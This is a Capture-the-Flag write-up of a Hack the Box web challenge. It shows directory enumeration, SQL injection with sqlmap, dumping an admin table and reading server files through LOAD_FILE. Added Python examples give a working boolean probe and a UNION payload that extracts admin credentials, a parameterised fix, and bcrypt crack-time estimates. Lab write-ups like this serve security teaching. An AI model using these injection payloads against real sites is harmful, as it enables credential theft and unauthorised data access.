Hack the Box: FreeLancer

Challenge Lab: Web

Difficulty: Medium

“Can you test how secure my website is? Prove me wrong and capture the flag!”

Let’s start by pulling up the website:

I ran gobuster on the webpage to find more directories:

At /administrat, there is a login page:

And at /portfolio.php there is a log cabin image:

After some manual testing of the site, I used sqlmap to check for SQL injection:

Answer “Y” to sqlmap’s prompts and it will eventually enumerate the database tables:

Dumping those tables, the portfolio table only held the site’s own content, but the safeadmin table held something more interesting:
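As an added example (not code from the original writeup or the challenge), the script below reproduces in SQLite what sqlmap automates against a page like /portfolio.php: a boolean probe that confirms the parameter is injectable, a UNION payload that pulls the safeadmin row out through the portfolio query, and the parameterised query that defeats the same payload. Only the table names portfolio and safeadmin come from the page; the column names, the id parameter and the placeholder hash are assumptions.

```python
import sqlite3

# Constructed sample data. Column names, the id parameter and the
# placeholder hash are assumptions for this example; only the table
# names portfolio and safeadmin appear in the writeup.
SAMPLE_ADMIN_HASH = "$2y$10$" + "A" * 53   # bcrypt-shaped placeholder, not a real hash


def build_db():
    """In-memory stand-in for the challenge's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE portfolio (id INTEGER, title TEXT, image TEXT)")
    conn.execute("INSERT INTO portfolio VALUES (1, 'Log cabin', 'cabin.jpg')")
    conn.execute("CREATE TABLE safeadmin (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO safeadmin VALUES (1, 'safeadmin', ?)", (SAMPLE_ADMIN_HASH,))
    conn.commit()
    return conn


def portfolio_lookup_vulnerable(conn, item_id):
    """Mimics a PHP page that concatenates a request parameter into the query."""
    query = f"SELECT title, image FROM portfolio WHERE id = '{item_id}'"
    return conn.execute(query).fetchall()


def portfolio_lookup_safe(conn, item_id):
    """Parameterised version: the value never becomes part of the SQL text."""
    return conn.execute(
        "SELECT title, image FROM portfolio WHERE id = ?", (item_id,)
    ).fetchall()


def boolean_probe(conn, item_id):
    """Manual check behind sqlmap's boolean-based detection: the same id with
    an always-true and an always-false condition must give different results."""
    true_rows = portfolio_lookup_vulnerable(conn, f"{item_id}' AND '1'='1")
    false_rows = portfolio_lookup_vulnerable(conn, f"{item_id}' AND '1'='2")
    return true_rows != false_rows


# UNION payload: the closing quote and the comment neutralise the rest of the
# original statement, and the second SELECT must match the column count (2).
UNION_PAYLOAD = "x' UNION SELECT username, password FROM safeadmin-- -"


def dump_safeadmin(conn):
    """Pulls the safeadmin table out through the vulnerable portfolio query."""
    return portfolio_lookup_vulnerable(conn, UNION_PAYLOAD)


if __name__ == "__main__":
    db = build_db()
    print("injectable:", boolean_probe(db, "1"))
    print("vulnerable:", dump_safeadmin(db))
    print("parameterised:", portfolio_lookup_safe(db, UNION_PAYLOAD))
```

The boolean probe is the quick manual test to run before reaching for sqlmap; if the two responses are identical the parameter is probably not injectable in that way, and the UNION payload only works once the column count of the original SELECT has been matched.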

That password hash looks like bcrypt (hashcat mode 3200). bcrypt is deliberately slow, and its cost factor makes cracking take a very long time, so I left hashcat running and carried on enumerating in the meantime:
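As an added example (not from the original writeup), this Python snippet does the two checks worth making before committing hashcat time to a hash like this one: confirm it really is bcrypt-shaped and read off its cost factor, then estimate how long a wordlist run will take at that cost. The placeholder hash, the wordlist size and the cost-5 benchmark rate are all assumptions.

```python
import re

# Accepts the 2a/2b/2x/2y variants: "$2y$<cost>$<22-char salt><31-char digest>".
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")
HASHCAT_MODE = 3200   # hashcat's mode for bcrypt


def parse_bcrypt(hash_str):
    """Returns the hash's parts, or None if the string is not bcrypt-shaped."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        return None
    cost = int(m.group(1))
    return {
        "cost": cost,
        "rounds": 2 ** cost,     # key-setup iterations; each +1 doubles the work
        "salt": m.group(2),
        "digest": m.group(3),
        "hashcat_mode": HASHCAT_MODE,
    }


def crack_time_seconds(cost, candidates, rate_at_cost5):
    """Estimated seconds to try `candidates` passwords against one hash.

    rate_at_cost5 is hashes/second at cost 5 (the cost hashcat -b reports
    bcrypt at); the real rate halves for every cost step above that."""
    effective_rate = rate_at_cost5 / 2 ** (cost - 5)
    return candidates / effective_rate


if __name__ == "__main__":
    # Constructed placeholder shaped like a bcrypt hash, not a real one.
    sample = "$2y$10$" + "A" * 53
    info = parse_bcrypt(sample)
    print(info)
    # Assumed figures: a 14.3M-entry wordlist and 30 kH/s at cost 5.
    hours = crack_time_seconds(info["cost"], 14_300_000, 30_000) / 3600
    print(f"cost {info['cost']}: ~{hours:.1f} hours for the whole wordlist")
```

The point of the estimate is the exponent: a hash at cost 12 takes four times as long per candidate as one at cost 10, which is why it makes sense to keep enumerating rather than wait on hashcat.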

I assumed these credentials were for the /administrat login page found earlier, so I ran gobuster against that directory to see what else it contained:

Navigating to /panel.php kept redirecting me to /index.php, presumably because I was not logged in. Rather than wait for the hash to crack, I read panel.php through the MySQL injection instead, using sqlmap’s --file-read option. This works only because the database user holds the FILE privilege (LOAD_FILE() is what does the reading) and secure_file_priv does not block the path:

sqlmap reports that the file was retrieved and saved locally:

Let’s open up that file location:

The flag is nestled near the bottom of that file, so there was no need to crack that password after all.

Happy Hacking! ❤
